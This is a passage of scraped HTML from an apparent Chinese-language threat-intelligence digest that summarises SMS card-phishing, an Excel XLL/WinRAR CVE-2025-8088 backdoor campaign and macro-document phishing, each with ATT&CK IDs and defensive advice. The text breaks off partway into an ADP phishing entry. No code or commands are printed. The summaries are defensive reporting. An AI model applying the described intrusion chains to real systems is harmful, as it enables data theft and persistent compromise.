[]">一起大规模浏览器钓鱼活动通过冒充相关配套服务，结合物流、金融类诱饵构建跨领域钓鱼生态。攻击者以交通罚款逾期为由发送短信，附带伪装成官方服务的URL地址，诱导用户点击跳转到克隆官方界面的钓鱼页面。该页面可动态生成虚假罚单记录，并营造支付紧迫感，页面仅要求填写银行卡 CVV、安全码等关键信息，所获数据直接传输至攻击者后端系统。活动利用共享基础设施托管 36 个以上仿冒域名及对应服务器，通过与知名机构关联的手机号发送短信提升可信度，体现出高度组织性与技术熟练度。此类攻击可能导致用户银行卡信息泄露，引发财务欺诈、资金被盗等问题，还会损害相关机构公信力。</span></p><p style="text-align: center;" nodeleaf=""><img data-imgfileid="100027348" class="rich_pages wxw-img" data-ratio="1.499267935578331" data-s="300,640" data-type="png" data-w="683" style="width:100%;" type="block" data-backw="570" data-backh="855" src="https://wechat2rss.xlab.app/img-proxy/?k=7122dd3f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6AoQM3RKCWV1WB2d9vwK9I3qKtUnGhaicZowG8ZaDPxlgzYB1fDjQlkQ3nc9oC3ia4E7FwRyRVYyRXPZwWaRriaFw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8j8nug1wkv" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigdjvi20or" style="font-size: 14px;" data-mpa-action-id="mdigdjvs190d" data-pm-slice="0 0 []">警惕未知来源短信及可疑链接，金融机构强化多因素认证并发布防钓鱼提醒，相关部门加强钓鱼基础设施监控封堵，筑牢防护防线。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigfqighko"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8ma0u31cup" style="font-size: 32px;" data-mpa-action-id="md8ma0v2rky" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid="" data-mpa-action-id="mfag8t7o1pcm" data-pm-slice="0 0 []"><span mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">通过Excel XLL加载项结合漏洞RAR隐蔽实现恶意代码长期控制</span></span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j8nugupq" style="font-size: 14px;"><span style="font-weight: bold;"><span leaf="">攻击方式关键词：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">混淆文件或信息（T1027）、伪装（T1036）、通过命令与控制通道进行数据窃取（T1041）、进程注入（T1055）、PowerShell（T1059.001）、Windows 命令 Shell（T1059.003）、Web 协议（T1071.001）、入口工具传输（T1105）、利用客户端漏洞执行（T1203）、恶意文件（T1204.002）</span></span></p></li><li><p><span mpa-font-style="md8jbwp71xl3" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/paper-werewolf-campaign/" target="_blank">https://www.hendryadrian.com/paper-werewolf-campaign/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="mdigfqi21vxd" style="font-size: 14px;">本次攻击活动利用恶意 Excel .XLL 加载项、武器化 RAR 归档文件及 WinRAR 漏洞（CVE-2025-8088）实施，相关基础设施、诱饵文档与提取技术与已知组织过往活动关联，体现攻击者技术与策略的持续演进。攻击者通过 Excel .XLL 加载项加载本地 DLL，绕过宏安全控制触发代码执行并实现持久化，投放二级后门以隐藏进程形式运行，后台收集系统 IP、操作系统、用户名等情报，经编码后通过 HTTPS C2 服务器传输，通信时忽略 TLS 验证。同时利用 ADS 路径遍历技术在系统启动文件夹植入脚本，借助相关机制实现延迟执行，支持远程命令执行、文件分块传输等功能，所用域名兼具 C2 通信与文件分发作用。攻击导致目标系统持久感染，面临信息泄露、业务中断等风险。</span></p><p style="margin-top: 16px;text-align: left;"><span mpa-font-style="mdigfqi2x23" style="font-size: 14px;"><span leaf="" style=""><span textstyle="" style="font-weight: bold;">防护建议：</span></span></span></p><p style="margin-top: 0px;text-align: left;"><span mpa-font-style="mdigfqi2x23" style="font-size: 14px;"><span leaf="">加强 Excel 加载项与 WinRAR 安全管控，及时修补漏洞，验证邮件和文档来源，部署监控工具检测异常通信与进程，定期检查系统启动项。</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdighks2kof"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9n1h17ag" style="font-size: 32px;" data-mpa-action-id="md8m9n2ku94" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">利用社工钓鱼、恶意文档投递及AV图标伪装实施攻击，可能引发受害系统数据破坏与情报窃取</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jdygzf90"><span leaf="">攻击方式关键词：</span></span></p><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: justify;"><span leaf="">混淆文件或信息（T1027）、匹配合法资源名称或位置（T1036.005）、Windows 管理规范（T1047）、Visual Basic（T1059.005）、Python（T1059.006）、Web 协议（T1071.001）、入口工具传输（T1105）、恶意文件（T1204.002）、系统二进制代理执行（T1218）、安全软件发现（T1518.001）、鱼叉式钓鱼附件（T1566.001）、鱼叉式钓鱼链接（T1566.002）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8jdygzm0s" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.seqrite.com/blog/ung0801-tracking-threat-clusters-obsessed-with-av-icon-spoofing-targeting-israel/" target="_blank">https://www.seqrite.com/blog/ung0801-tracking-threat-clusters-obsessed-with-av-icon-spoofing-targeting-israel/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jdygzmy1" style="font-size: 14px;">近期，有两类攻击方式值得关注。第一类，通过伪装成安全工具的恶意程序泄露用户数据，该程序利用 Phishing 技术传播并进行系统扫描、权限检测与数据破坏。攻击者使用伪装的 PDF 文件，诱使受害者下载名为“Security Scanner”的工具，实际加载的是恶意代码，并在系统中实行破坏性操作。第二类，攻击则通过冒充合法公司名义发送钓鱼邮件，附带带有宏的恶意文档，利用宏机制执行代码，提取并重构最终载荷，进而窃取信息。虽然两种攻击在技术细节上有所不同，但都展示了相同的攻击特征，显示出高度的社会工程学技巧。这两系列攻击可能导致受害者系统数据被广泛删除以及信息安全隐患，因此对企业造成严重威胁。</span></p><p style="text-align: center;" nodeleaf=""><img data-imgfileid="100027349" class="rich_pages wxw-img" data-ratio="0.6004273504273504" data-s="300,640" data-type="png" data-w="468" style="width:100%;" type="block" data-backw="468" data-backh="281" src="https://wechat2rss.xlab.app/img-proxy/?k=44ad3595&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6AoQM3RKCWV1WB2d9vwK9I3qKtUnGhaic60ibLZw5tM5VuIFYR1ZpLQjnIHNgDofzFhIFZWIWnGofnjBOM2hFIvw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-imgfileid="100027350" class="rich_pages wxw-img" data-ratio="0.5790598290598291" data-s="300,640" data-type="png" data-w="468" style="width:100%;" type="block" data-backw="468" data-backh="271" src="https://wechat2rss.xlab.app/img-proxy/?k=4cd310b5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6AoQM3RKCWV1WB2d9vwK9I3qKtUnGhaicMHpiapA8QhwBQGLdhfmScpss0eZsWhPLhd9DpnzlgezvRwXfnHTF2ZA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jdygz14il" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span style="font-size: 14px;" mpa-font-style="mdighkrrvpq"><span leaf="">提高对钓鱼邮件及附件的监测能力，针对未知来源的文件进行行为分析，并加强多因素认证和软件更新，加强对非内部平台的监控，部署企业级安全防护方案，及时响应任何异常网络流量，以降低损失。</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">04</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">伪造邮件和钓鱼页面假冒ADP公司，达成账户接管与敏感信息窃取</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jfbe92df"><span leaf="">攻击方式关键词：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span 